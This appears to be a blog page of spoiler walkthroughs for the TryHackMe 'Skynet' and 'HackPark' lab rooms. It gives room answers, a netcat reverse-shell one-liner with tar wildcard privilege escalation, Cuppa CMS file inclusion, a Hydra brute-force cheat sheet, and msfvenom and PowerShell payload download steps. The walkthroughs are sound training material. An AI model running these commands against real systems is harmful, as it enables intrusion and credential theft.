thm-terminator-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called terminator at

Hasta la vista, baby.

Are you able to compromise this Terminator themed machine?

You can follow our official walkthrough for this challenge on our blog.


#1 What is Miles password for his emails?
cyborg007haloterminator
#2 What is the hidden directory?
#3 What is the vulnerability called when you can include a remote file for malicious purposes?
remote file inclusion
#4 What is the user flag?
#5 What is the root flag?
3f0372db24753accc7179a282cd6a949

Skynet Writeup

Skynet Writeup
Follow along with this writeup, and deploy your own instance of Skynet! https://tryhackme.com/room/skynet
Summary:

  • Scan ports using nmap
  • Use GoBuster to enumerate directories
  • Experiment with SMBMap to find Samba shares
  • Using enumerated credentials to read emails
  • Exploit CMS RFI vulnerability
  • Exploit tar wildcards for privilege escalation

Lets first begin by enumerating the machine as much as possible, by using nmap.

nmap -sV <ip>

We can see that that there is a web server running, upon visiting we can see the following:

“Skynet” is a artificial neural network-based conscious group mind and artificial general intelligence system

Lets use GoBuster to locate any directories!

gobuster -u http://<ip> -w <wordlist_location> -t 40

Sometimes, we’re confident that there is something to be found and we waste too much time on it. Often, there are rabbit holes that can trip you up. Make sure to take breaks if you get stuck and try different approaches.

Going back to the drawing board, we saw that pop3 and imap ports were open, I wonder what else could be potentially found? Remember what I said above!

SMBMap allows users to enumerate samba share drives across an entire domain. This program is available on all Kali Linux machines. If you don’t have the time or resources to set your own Kali Linux machine up, you can deploy your own and control it within your browser. Check it out.

The scan reveals a share called “anonymous” that has read access. Lets connect to the share and investigate.

smbclient //<ip>/anonymous

Log1.txt contains possible passwords and there is a smb share called milesdyson. We have some potential credentials here… But SSH is disabled! What else can we do?

An earlier GoBuster scan revealed  SquirrelMail!

Gasp! Reading his emails reveals a Samba password reset!

Lets log into Miles’ share and see what interesting things we can find! You should find a file that gives you information about a new CMS.

Visiting the CMS reveals Miles Dysons Personal Page

If you use GoBuster on the /45kra24zxs28v3yd/ directory, you will reveal an /administrator page. This reveals a Cuppa CMS!

Looking at the source code will give you an indication of the CMS’ version. After some online research, there is a public exploit for it! https://www.exploit-db.com/exploits/25971

Get a shell script and change the IP to be your tun0 IP (ifconfig), host it locally using Python, use netcat to listen for a session and then remotely include this shell on the webserver.

The screenshot below explains the correct steps in obtaining a low privilege shell by exploiting the RFI vulnerability! You can download a PHP reverse shell from PentestMonkey.

So whats actually going on here? In the CMS code, there is a bit of PHP code that includes files:

<?php include($_REQUEST["urlConfig"]); ?>

However, this allows us to include our own shells (or even include a file on the system such as /etc/passwd). For a more detailed explanation, please read the exploit-db description.

Now that we have a shell, we can get the user flag. Next step is to escalate our privileges to root!

Upon enumerating the Linux machine, we can see there are several regular cronjobs running.

So the file /home/milesdyson/backups/backup.sh is being called every minute. Inspecting this file:

This gets a shell, navigates to the /var/www/html directory and create a backup of everything in the directory.

Well, believe it or not, this creates a vulnerability as we can use it to  execute code. HelpNetSecurity best explains how this vulnerability works, but in essence, tar has wildcards and we can use checkpoint actions to execute commands.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip>
1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Then open up a netcat session and you will receive a shell as root!

thm-hackpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called hackpark at

Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.


#1 Deploy the machine and access its web server.
#2 Whats the name of the clown displayed on the homepage?

 

[Task 2] Using Hydra to brute-force a login

Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!

Brute-forcing can be trying every combination of a password. Dictionary-attack’s are also a type of brute-forcing, where we iterating through a wordlist to obtain the password.


#1 We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a GET request which is used to request data from a webserver and a POST request which is used to send data to a server.

You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).

What request type is the Windows website login form using?

#2 Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.

Run the following command but fill in the blanks:

hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form

Guess a username, choose a password wordlist and gain credentials to a user account!

#3 Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).

However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.

Below is a mini cheatsheet:

Command Description
hydra -P <wordlist> -v <ip> <protocol> Brute force against a protocol of your choice
hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol> You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip> Attack a Windows Remote Desktop with a password list.
hydra -l <username> -P .<password list> $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ Craft a more specific request for Hydra to brute force.
.

In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!

Exploit-Database is a CVE (common vulnerability and exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researches. It is owned by Offensive Security (who are responsible for OSCP and Kali)


#1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
#2 Use the exploit database archive to find an exploit to gain a reverse shell on this system.

What is the CVE?

#3 Using the public exploit, gain initial access to the server.

Who is the webserver running as?

.

In this task we will learn about the basics of Windows Privilege Escalation.

First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.


#1 Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.

If you don’t know how to do this, I suggest completing up to task 3 in our Metasploit room first!

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!

#2 You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.

What is the OS version of this windows machine?

#3 Further enumerate the machine.

What is the name of the abnormal service running?

#4 What is the name of the binary you’re supposed to exploit?
#5 Using this abnormal service, escalate your privileges!

What is the user flag (on Jeffs Desktop)?

#6 What is the root flag?

In this task we will escalate our privileges without the use of meterpreter/metasploit!

Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.

Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


#1 Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp
#2 After generating our payload we need to pull this onto the box using powershell.

Tip: It’s common to find C:\Windows\Temp is world writable!
#3 Now you know how to pull files from your machine to the victims machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Tip: You can execute these files by using .\filename.exe

Using winPeas, what was the Original Install time of the server ? (This is date and time) ,Found from cmd-shell with : systeminfo

Writeup :

Try it for yourself here.

Deployment and reverse image search

After the machine deployed I opened the website and got prompted by this friendly clown:

I guess most of you recognized him right off the bat as Pennywise from the Movie IT. I didn’t, so I used reverse image search to find who he is. Google didn’t provide any good output, but TinEye did.

Login brute force with Hydra

The website has a login section. TryHackMe prompts us to guess a user name, so we’ll use good old “admin”. Here’s the Hydra command to brute-force the web form:

Don’t panic, it’s not really complicated

Most of the command consists of the string after “http-post-form”. This string has three parts divided by colons — “path to the login form page : request body : error message indicating failure”

To get this information open the networks tab in the developer tools, send one login request with random credentials and inspected it by clicking “Edit and Resend”.

The request body can be found in the “Request Body” section at the bottom. Before pasting it in the terminal we need to find where the credentials are used, so hydra would know to insert it’s guessing there.

Now I can replace the “asdf” I entered with ^USER^ and ^PASS^ for Hydra

One last piece of information Hydra needs is a message indicating failure, so it could tell when the guessed password is correct. At login failure, the site prompts us with “Login failed”. That’s exactly the string We need.

After running Hydra and obtaining the password We can log into BlogEngine as admin 🔥

Compromise the machine

The first thing to be done is to check the version of BlogEngine. It can be found in the “About” tab. A quick google search of this version revealed this exploit in exploit-db.

Example search for an exploit with the “searchsploit” command on Kali Linux. We’ll use the fourth result.

Inside the exploit, a comment specified exactly what we needed to do to get this running. Firstly change the address and port of the attacker to yours.

Rename the exploit to PostView.ascx. It should be uploaded via editing a post:

To upload the file edit the only post on the website and click the folder icon marked above

To get the reverse shell we only need to start a Netcat listener and navigate to http://10.10.147.54/?theme=../../App_Data/files

There is nothing prettier than getting a reverse shell

By running whoami we see that the server is running as “iis apppool\blog”.

Privilege Escalation [without Metasploit]

Before scanning the machine to find a way to escalate privileges, Let’s get a stable shell. We will create a reverse shell executable with msfvenom:

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]

Now the payload is ready. Start a small server so the machine would be able to download the executable with python3 -m http.server.

We don’t have write permissions to the current folder, so before downloading navigate to C:\Windows\Temp. To download use this command:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://[your_ip]:[listening_port]/[shell_name.exe]')"

amazing. Now listen on the port you specified previously and run the executable.

A stable reverse shell

The same way we sent this reverse shell we can send an enumeration script. I used winPEAS.

Analyzing the results of the enumeration took a while. Under the “Running Processes” section exists a service name “Message.exe”. Further inspection shows that it keeps on running and stopping repeatedly. If we can replace Message.exe with our reverse shell script we can get a shell with higher privileges.

Message.exe can be found under C:\Program Files (x86)\SystemScheduler. Rename Message.exe to Message.bak, send your shell and rename it to Message.exe. Don’t forget to listen on the port you specified!

Wait for a little, and voila! we have a shell. running whoami returns:

These permissions are enough to access both “jeff” and “Administrator” that hold the user and root flags.

Author: Jacco Straathof

Beveiligd: htb-magic-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: thm-steelmountain-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: thm-vulnversity-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-servmon-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-forwardslash-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-endgame-poo

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-endgame-xen

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-onetwoseven-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op